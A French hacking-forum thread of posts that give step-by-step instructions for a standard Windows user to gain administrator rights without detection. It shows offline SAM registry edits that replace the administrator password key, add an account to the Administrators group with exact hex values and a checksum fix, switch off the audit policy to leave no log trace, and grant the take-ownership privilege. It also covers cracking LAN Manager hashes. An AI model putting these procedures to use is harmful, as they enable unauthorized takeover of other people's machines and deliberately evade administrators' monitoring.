Devenir administrateur en toute discretion....HowTo

Le but ici est d'accroître sa connaissance, de tout faire à la mano, de comprendre le registre et d'être discret.

Petite precision : on va jouer avec le registre, si cela pose pb, je peux faire une demo sur nantes.
Voir http://www.nhfr.org/boites-a-idees-f14/mini-asso-pour-regler-les-pb-sur-nantes-autour-d-un-cafe-t2578.htm

Principe :
-Backup du compte administrateur
-Modification du password admin
-Restauration du backup
-Editer le registre en offline (le CD de Petter Nordahl-Hagen's fera l'affaire, il contient beaucoup de pilote pour les disques et utilise depuis peu NTFS-3g).


Note : Le backup contiendra les informations du compte administrateur, donc le nombre d'ouverture de session.... La restauration permettra d'eliminer les traces au niveau du compte administrateur.

Pour cette methode tout se passe ici :



Petit rappel :
La clef de registre suivante :

Code:

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]

est la clef representant les informations de compte pour l'authentification de l'administrateur

Dont voici un dump :

Code:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]
"F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,40,fd,f0,f3,36,17,c9,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,00,00,00,00,01,00,00,00,00,\
  00,00,00,00,00,00,00
"V"=hex:00,00,00,00,bc,00,00,00,02,00,01,00,bc,00,00,00,1c,00,00,00,00,00,00,\
00,d8,00,00,00,00,00,00,00,00,00,00,00,d8,00,00,00,4a,00,00,00,00,00,00,00,\
24,01,00,00,00,00,00,00,00,00,00,00,24,01,00,00,00,00,00,00,00,00,00,00,24,\
01,00,00,00,00,00,00,00,00,00,00,24,01,00,00,00,00,00,00,00,00,00,00,24,01,\
00,00,00,00,00,00,00,00,00,00,24,01,00,00,00,00,00,00,00,00,00,00,24,01,00,\
00,00,00,00,00,00,00,00,00,24,01,00,00,15,00,00,00,a8,00,00,00,3c,01,00,00,\
08,00,00,00,01,00,00,00,44,01,00,00,04,00,00,00,00,00,00,00,48,01,00,00,14,\
00,00,00,00,00,00,00,5c,01,00,00,04,00,00,00,00,00,00,00,60,01,00,00,04,00,\
00,00,00,00,00,00,01,00,14,80,9c,00,00,00,ac,00,00,00,14,00,00,00,44,00,00,\
00,02,00,30,00,02,00,00,00,02,c0,14,00,44,00,05,01,01,01,00,00,00,00,00,01,\
00,00,00,00,02,c0,14,00,ff,ff,1f,00,01,01,00,00,00,00,00,05,07,00,00,00,02,\
00,58,00,03,00,00,00,00,00,14,00,5b,03,02,00,01,01,00,00,00,00,00,01,00,00,\
00,00,00,00,18,00,ff,07,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,\
00,00,00,24,00,44,00,02,00,01,05,00,00,00,00,00,05,15,00,00,00,8a,a7,32,3f,\
18,51,49,64,f8,9f,b4,74,f4,01,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,\
02,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,41,00,64,00,6d,00,\
69,00,6e,00,69,00,73,00,74,00,72,00,61,00,74,00,65,00,75,00,72,00,43,00,6f,\
00,6d,00,70,00,74,00,65,00,20,00,64,00,27,00,75,00,74,00,69,00,6c,00,69,00,\
73,00,61,00,74,00,65,00,75,00,72,00,20,00,64,00,27,00,61,00,64,00,6d,00,69,\
00,6e,00,69,00,73,00,74,00,72,00,61,00,74,00,69,00,6f,00,6e,00,0d,00,ff,ff,\
  ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,e2,f2,f7,01,02,00,\
00,07,00,00,00,01,00,01,00,01,00,01,00,4e,c0,a5,d4,56,fa,80,7a,63,9f,87,25,\
  9e,e5,84,a9,01,00,01,00,01,00,01,00

Nous sommes en presence de 2 clefs:
"F" et "V"

Petite explication de "F" et de "V":

La clef "F" : C'est la clef des options, cad :

Elle contient :
-renseignement sur la date de derniere ouverture de session
-renseignement sur l'expiration du compte
-renseignement sur le nombre de mauvaise tentative
-compte actif / inactif
......

Donc pour la discretion, il faut y faire attention....

La clef "V" : C'est la clef qui contient le password, enfin "LES" passwords:
-renseignement sur le profil
-renseignement sur les heures de logon
-renseignement sur les commentaires du compte
.....
-Et le password

Pour etre plus precis, voila la partie a prendre en compte (la fin) :

Code:

e2,f2,f7,01,02,00,00,07,00,00,00,01,00,01,00,01,00,01,00,4e,c0,a5,d4,56,fa,80,7a,63,9f,87,25,\
  9e,e5,84,a9,01,00,01,00,01,00,01,00

Le stockage du password :

Windows conserve le password comme cela :

Il crypte le password de manière non réversible en "Lan Manager" et en "NTLM"

Astuces : Pour sécuriser un peu plus vos passwords, il faut utiliser un password de plus de 14 caractères.... Pourquoi ?

PARCE QUE !!!, non, la réponse est simple, tout est dans l'authentification "Lan Manager", ce cryptage ne distingue pas les majuscules des minuscules, de plus le cryptage est fait par bloque de 7 caractères, hors "Lan Manager" ne permet le stockage que sur 2 bloques.

Donc il suffit de se constituer un dictionnaire contenant toutes les possibilités sur 7 caractères pour decrypter le password.

Actuellement sur les nouvelles machines il ne faut pas plus de 1/4 heure pour decrypter un mot de passe.
Ex : sur un P4 3GHz, avec un dictionnaire "Lan Manager", j'ai decrypté ce password : Mr5@9!hoO en 7 min 37 s
Il fait 9 caractères, mais en "Lan Manager" il fait 7 caractères + 2, donc les 2 caractères de la fin ne necessitent que 10ms a peine, il reste donc les 7 caractères a trouver.

Code:

Découpage "Lan Manager" :  MR5@9!H      OO

Pour un password de 14 caractères, le temps de décryptage sera le même que pour 7 caractères, l'application travaillera en parallèle sur les 2 bloques.

Si le password depasse 14 caractères ( 2 x 7 pour rappel) windows ne peut plus le stocker en "Lan Manager", il ne reste plus que "NTLM"

Au final, le password le plus complexe en "Lan Manager" est un mot de passe de 7 caractères utilisant des chiffres, des lettres (peut importe majuscule ou minuscule c'est la même chose pour lui), et surtout des symboles.

Sinon : plus de 14 caractères avec des lettres (majuscule ET minuscule), et des symboles.


Exemple de compte Actif/inactif :

Retournons sur la clef "F" :

Code:

"F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
00,40,fd,f0,f3,36,17,c9,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,00,00,00,00,01,00,00,00,00,\
  00,00,00,00,00,00,00

Arrêtons nous sur ceci :

Code:

2,00,00,10,02,00,00

c'est une partie de la 3 ème ligne (Offset 38 de la clef)

je zoom sur le "10"

Code:

10 => compte actif
11 => compte inactif / verrouillé

Ici mon administrateur a un compte actif.....

Au passage je zoom sur le "02"

Code:

02 => password n'expire jamais
00 => password expire en fonction de la strategie locale

Ici le password de l'administrateur n'expire jamais.....

GO GO GO...

La capture de la clef de l'administrateur (de "V" et de "F") représente le compte administrateur avec un mot de passe vide.

Vous trouverez si besoin mon fichier ici :
http://rapidshare.com/files/145484888/admin.zip.html

En mode offline, il suffit de faire un backup de la clef :

Code:

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4]

De la remplacer par mon fichier, ou un autre contenant un password connu, et la...

Vous êtes administrateur de la machine

Durant la session la clef "F" va etre modifier : nombre de session ouverte....

Ce n'est pas grave, lorsque vous avez terminé de faire vos manipulation sous le compte administrateur, il suffit de restaurer le backup de la clef contenant l'ancien password de l'administrateur.

Méthode 2 By Zekroustibat

Petite precision : on va jouer avec le registre, si cela pose pb, je peux faire une demo sur nantes.
Voir http://www.nhfr.org/boites-a-idees-f14/mini-asso-pour-regler-les-pb-sur-nantes-autour-d-un-cafe-t2578.htm

Le principe: Editer le registre en offline (le CD de Petter Nordahl-Hagen's fera l'affaire, il contient beaucoup de pilote pour les disques et utilise depuis peu NTFS-3g). Le groupe admin local du systeme est defini ici :



La clef "C" indique les options du groupe



Pour simplifier l'explication je fais un export de cette clef :

Code:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Builtin\Aliases\00000220]
"C"=hex:20,02,00,00,00,00,00,00,98,00,00,00,02,00,01,00,98,00,00,00,1e,00,00,\
00,00,00,00,00,b8,00,00,00,d6,00,00,00,00,00,00,00,90,01,00,00,38,00,00,00,\
02,00,00,00,01,00,14,80,78,00,00,00,88,00,00,00,14,00,00,00,44,00,00,00,02,\
  ............. 65,00,00,00,01,05,00,00,00,00,00,05,15,00,00,00,8a,a7,32,3f,18,51,49,64,f8,\
9f,b4,74,f4,01,00,00,01,05,00,00,00,00,00,05,15,00,00,00,8a,a7,32,3f,18,51,\
  49,64,f8,9f,b4,74,eb,03,00,00


Je coupe un peu pour plus de clarté...voilà

Ce qu'il faut voir la-dedans....
Dans mon exemple j'ai un compte "user" dans le groupe administrateur et evidemment le compte "administrateur", en option, on retrouve aussi les comptes de domaine....(pour le cas Zeitoon)
Une reference de compte utilise 28 bloques hexa...Tres important pour la suite...
Ex: voici le compte "user"

Code:

01,05,00,00,00,00,00,05,15,00,00,00,8a,a7,32,3f,18,51,\
  49,64,f8,9f,b4,74,eb,03,00,00

A noter: les 4 derniers bloques :

Code:

eb,03,00,00

C'est l'alias du compte "user" (son RID) dans mon exemple
Tout comme :

Code:

f4,01,00,00

est l'alias (le RID) du compte administrateur....

L'identification de l'administrateur se fait avec son SID, pour le compte administrateur intégré par exemple, c'est :

Code:

S-1-5-21-SID-500

la derniere partie : "500" represente son RID, c'est toujours le meme.

En hexa "500" donne "1F4"...

Donc si je reprends "S-1-5-21-SID-500" donne en hexa :

Code:

01,05,00,00,00,00,00,05,15,00,00,00,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,
F4,01,00,00

Mon compte "user" a donc un RID de "1003"

Et le plus important :
Le SID, qui est en fait l'ID de domaine, dans mon cas, sur ma machine, c'est :

Code:

8a,a7,32,3f,18,51,49,64,f8,9f,b4,74

Dans le cas de Zeitoon, ton compte est je suppose un compte de domaine Active Directory, donc tu dois avoir dans la clef "C" le groupe "Admins du domaine", qui a l'ID du domaine....

Prenons maintenant un compte, utilisateur standard... bah oui le pauvre, il peut pas faire grand chose sur la machine
il s'appelle "toto" dans mon exemple (deformation professionnelle, je suis instructeur...), mais bon son nom nous importe peu, bien que.....

Il veut les droits d'admin...

Mr Toto possede le RID 1004



3EC en hexa c'est 1004 en decimal

Pour le cas Zeitoon, pour trouver ton SID complet (donc ton RID) tu as des utilitaires sur internet pour lire ton jeton une fois authentifié, meme un compte invité peut le faire....

Donc, une fois que l'on a ça, on peut en déduire la version hexa du SID de toto :

Code:

01,05,00,00,00,00,00,05,15,00,00,00,8a,a7,32,3f,18,51,\
  49,64,f8,9f,b4,74,ec,03,00,00

J'ajoute donc a ma clef "C", les 28 bloques du SID de "toto", ce qui donne :

Code:

"C"=hex:20,02,00,00,00,00,00,00,98,00,00,00,02,00,01,00,98,00,00,00,1e,00,00,\
00,00,00,00,00,b8,00,00,00,d6,00,00,00,00,00,00,00,90,01,00,00,38,00,00,00,\
02,00,00,00,01,00,14,80,78,00,00,00,88,00,00,00,14,00,00,00,44,00,00,00,02,\
  ...............
65,00,00,00,01,05,00,00,00,00,00,05,15,00,00,00,8a,a7,32,3f,18,51,49,64,f8,\
9f,b4,74,f4,01,00,00,01,05,00,00,00,00,00,05,15,00,00,00,8a,a7,32,3f,18,51,\
49,64,f8,9f,b4,74,eb,03,00,00,01,05,00,00,00,00,00,05,15,00,00,00,8a,a7,32,\
3f,18,51,49,64,f8,9f,b4,74,ec,03,00,00

Ensuite, il faut modifier le nombre d'appartenance au groupe, et c'est ici que ça se passe :

Code:

"C"=hex:20,02,00,00,00,00,00,00,98,00,00,00,02,00,01,00,98,00,00,00,1e,00,00,\
..............
02 <==== ici
  ...............
49,64,f8,9f,b4,74,eb,03,00,00,01,05,00,00,00,00,00,05,15,00,00,00,8a,a7,32,\
3f,18,51,49,64,f8,9f,b4,74,ec,03,00,00

A l'offset 30 de la clef "C"

J'avais 2 membres dans mon groupe, maintenant j'en ai 3, donc :

Code:

"C"=hex:20,02,00,00,00,00,00,00,98,00,00,00,02,00,01,00,98,00,00,00,1e,00,00,\
00,00,00,00,00,b8,00,00,00,d6,00,00,00,00,00,00,00,90,01,00,00,38,00,00,00,\
03,00,00,00,01,00,14,80,78,00,00,00,88,00,00,00,14,00,00,00,44,00,00,00,02,\
  ...............
49,64,f8,9f,b4,74,eb,03,00,00,01,05,00,00,00,00,00,05,15,00,00,00,8a,a7,32,\
3f,18,51,49,64,f8,9f,b4,74,ec,03,00,00

L'offset 30 passe de "02" à "03"

The Final....

Il reste juste un petit truc a regler, le pseudo checksum qui se trouve ici :

Code:

"C"=hex:20,02,00,00,00,00,00,00,98,00,00,00,02,00,01,00,98,00,00,00,1e,00,00,\
00,...........................juste la ======> 38,00,00,00,\
03,00,00,00,01,00,14,80,78,00,00,00,88,00,00,00,14,00,00,00,44,00,00,00,02,\
  ...............
49,64,f8,9f,b4,74,eb,03,00,00,01,05,00,00,00,00,00,05,15,00,00,00,8a,a7,32,\
3f,18,51,49,64,f8,9f,b4,74,ec,03,00,00

A l'offset 29 de la clef "C", dans mon cas il a pour valeur : 38

Humm 38 ??? c'est 19x2 ou encore 30+8.....
Eureka !!! c'est aussi 1C x 2 en hexa
Et 1C en hexa ça fait...... 28 en decimal

Le revoilà ce 28.... donc maintenant que j'ai 3 users :

Code:

3 x 1C = 54

Donc ma clef "C" devient :

Code:

"C"=hex:20,02,00,00,00,00,00,00,98,00,00,00,02,00,01,00,98,00,00,00,1e,00,00,\
00,00,00,00,00,b8,00,00,00,d6,00,00,00,00,00,00,00,90,01,00,00,54,00,00,00,\
03,00,00,00,01,00,14,80,78,00,00,00,88,00,00,00,14,00,00,00,44,00,00,00,02,\
  ...............
49,64,f8,9f,b4,74,eb,03,00,00,01,05,00,00,00,00,00,05,15,00,00,00,8a,a7,32,\
3f,18,51,49,64,f8,9f,b4,74,ec,03,00,00

Conclusion :

Il y a 3 modifications a faire :
1) j'ajoute a la suite le SID du user (local ou domaine)
2) je corrige le nombre de user (j'ajoute 1)
3) je corrige le pseudo checksum

Tout cela est reversible, et voilà, un administrateur de plus dans la machine !!!



Pour le cas de Zeitoon :
Ajout de mon compte de domaine dans le groupe administrateurs de la machine

To AUDIT or not to AUDIT that is the question !!

By Zekroustibat

Le but : contrer un audit mis en place par l'administrateur

Le principe : Qui dit audit, dit plus de discrétion !!
Donc avant toute modification on va regarder si l'administrateur local a mis en place une strategie d'audit. Si "OUI", on la neutralise...

GO GO GO...
On y va, toujours en offline puisque nous ne sommes pas administrateur.

Cela se passe ici :



je zoom sur la clef :



Cette clef gere la mise en place de l'audit, une fois la base de donnée de sécurité modifiée par l'administrateur et appliquée a la machine.

La base de donnée se trouve ici :

Code:

C:\%WINDIR%\security\Database\

C'est le fichier "secedit.sdb"

La faille :
La strategie s'applique lors d'une modification ou toutes les 16 heures, un compteur de temps est situé dans une autre clef (temps donné en minutes par rapport a l'année 1980)

Donc si on neutralise l'audit, que l'on bidouille notre compte pour devenir administrateur.... que l'on ni passe pas plus de 16h ou .... alors pas une trace de notre passage.

Ex : Audit activé

Si on active l'audit, on obtient cela :



A noter :
-Le premier bloque a changé
-Les bloques fonctionnent 4 par 4
-Le 3 ème bloque a changé :

Code:

03 00 00 00

Chaque bloque de 4 (sauf le premier et le dernier) représente une stratégie d'audit.

Une stratégie peut avoir 4 valeurs différentes

Code:

00 => non mise en place
01 => audit des opérations réussies
02 => audit des échecs
03 => audit des opérations réussies et des échecs

Dans mon exemple, l'audit est actif sur les opérations réussies et les échecs....
Question : MAIS AUDIT DE QUOI ???
Réponse : Le 3 ème bloque de 4, soit la 2 ème stratégie est la stratégie "Des évènements de connexion" ....
La pire pour tout bidouilleur de compte administrateur qui se respecte.

Mais bon rien de bien méchant, il pourrait activer tous les audits que ce serait pareil.

Pour preuve, voici le screenshot de ma demo :



Et voici le résultat dans le log de sécurité :



Oui, oui, je peux une fois administrateur vider le log.... MAIS c'est pas très discret ça !!!!

La solution :
Revenons à nos moutons....
Le tout premier bloque :

Code:

avant : 00      après : 01

Il suffit de le changer, si je repasse le 01 en 00, la configuration des stratégies est conservée, de toute façon je ne touche pas à la base de donnée, MAIS l'audit de la machine est désactivé. (voir chapitre "la faille")
Comme cela :



Il suffira de remettre la clef à "01" après nos opération....

By Zekroustibat

Le principe : Ici on ne sera pas super discret, juste ce qu'il faut... Le but : sous un compte utilisateur standard, on récupère le droit absolu de l'administrateur : la prise de possession
En gros, je peux accéder à tout, même si je n'ai aucun droit en online.

Les outils : Toujours le même : le CD de Petter Nordahl-Hagen's fera l'affaire, il contient beaucoup de pilote pour les disques et utilise depuis peu NTFS-3g.

Cette fois c'est ici que cela se passe :



Vous avez surement déjà joué avec cela :



La prise de possession est un droit ultime, par default seul l'administrateur possède ce droit, et en bon administrateur , on ne le donne a personne.

La partie registre :

Code:

[HKEY_LOCAL_MACHINE\SECURITY\Policy\Accounts]

Cette clef contient les références des utilisateurs et les droits associés

Ex : l'utilisateur dont le RID est 1002....



Arfff, il ne possède aucun droit délégué par stratégie.... Mauvais exemple ? non !

Pourquoi ?
Cela va me permettre d'introduire une clef supplémentaire.

La voilà :

Code:

Privilgs

A noter :

Code:

ActSysAc => non obligatoire
SecDesc => obligatoire
Sid => obligatoire

Exemple :
Voici un exemple de clef d'une personne : TOTO () RID 1004 ayant reçu le droit suite a grosse avec son admin..... de changer l'heure système. ....

Voici sa clef :

Code:

[HKEY_LOCAL_MACHINE\SECURITY\Policy\Accounts\S-1-5-21-1060284298-1682526488-1957994488-1004\Privilgs]
@=hex(0):01,00,00,00,00,00,00,00,0C,00,00,00,00,00,00,00,00,00,00,00

ou encore :



Explications :

Les 8 premiers bloques :

Code:

01 et 7 bloques de 00

01 indique le nombre de droits délégués que l'utilisateur possède, toujours accompagné de 7 x 00

Les 12 derniers bloques :

Représentent le droits :

Code:

0C et 11 bloques de 00

0C indique le droit délégué, toujours accompagné de 11 x 00

Conclusion :

0C = Modifier l'heure système

GO GO GO

Tout est là, le reste c'est du déjà vu....

Ah si, la pièce manquante au puzzle :

09 = Prendre possession des fichiers et d'autres objets

Si le compte n'a pas de clef...........On la rajoute !!!

ex : mon compte dont le RID est 1005, n'a pas de sous-clef dans

Code:

[HKEY_LOCAL_MACHINE\SECURITY\Policy\Accounts]

Voilà les clefs que je vais importer en offline :

Code:

[HKEY_LOCAL_MACHINE\SECURITY\Policy\Accounts\S-1-5-21-1060284298-1682526488-1957994488-1005]
@=hex:

[HKEY_LOCAL_MACHINE\SECURITY\Policy\Accounts\S-1-5-21-1060284298-1682526488-1957994488-1005\Privilgs]
@=hex(0):01,00,00,00,00,00,00,00,09,00,00,00,00,00,00,00,00,00,00,00

[HKEY_LOCAL_MACHINE\SECURITY\Policy\Accounts\S-1-5-21-1060284298-1682526488-1957994488-1005\SecDesc]
@=hex(0):01,00,04,80,48,00,00,00,58,00,00,00,00,00,00,00,14,00,00,00,02,00,34,\
00,02,00,00,00,00,00,18,00,0f,00,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,\
20,02,00,00,00,00,14,00,00,00,02,00,01,01,00,00,00,00,00,01,00,00,00,00,01,\
02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,01,01,00,00,00,00,00,05,12,00,\
  00,00

[HKEY_LOCAL_MACHINE\SECURITY\Policy\Accounts\S-1-5-21-1060284298-1682526488-1957994488-1005\Sid]
@=hex(0):01,05,00,00,00,00,00,05,15,00,00,00,8a,a7,32,3f,18,51,49,64,f8,9f,b4,\
  74,ed,03,00,00

Code:

Création de la branche
Création de la clef Privilgs avec prise de possession
Création de la clef SecDesc, je reprends la clef d'un compte existant...
Création de la clef Sid voir howto plus haut pour comprendre....

Et voilà, je redémarre, j'ouvre ma session, et malgré le refus d'ouvrir par le système un fichier ou autre, il m'indique via les propriétés que je peux prendre possession de l'objet, et ...

Code:

Qui dit propriétaire dit pleins pouvoirs

PS :
Vous pouvez ajouter autant de droit que vous le voulez ex :

Code:

[HKEY_LOCAL_MACHINE\SECURITY\Policy\Accounts\S-1-5-21-1060284298-1682526488-1957994488-1004\Privilgs]
@=hex(0):02,00,00,00,00,00,00,00,09,00,00,00,00,00,00,00,00,00,00,00\
0C,00,00,00,00,00,00,00,00,00,00,00

Ici :
2 droits => 02
possession => 09,00,00,00,00,00,00,00,00,00,00,00
réglage de l'heure => 0C,00,00,00,00,00,00,00,00,00,00,00

Dans sam, je n'ai pas d'arborescence moi.

Zeitoon a écrit:Dans sam, je n'ai pas d'arborescence moi.

si tu es en offline tu vois tout, si tu es sous windows, il te faut modifer les droits sur cette partie de la clef.

très complet ce tuto merci

Superbe ce tuto, ça peut servir

j'essaierais offline.

Debut de post sur : Comment contrer un audit

Voilà
Fin de post sur l'audit (post N°3 sur ce topic)

Bonne lecture

Debut de post : Take Ownership, le droit absolu
Voir post 4 de ce topic

Voilà
Fin de post sur "Take OwnerShip" (post N°4 sur ce topic)

Bonne lecture

j'ai épinglé ^^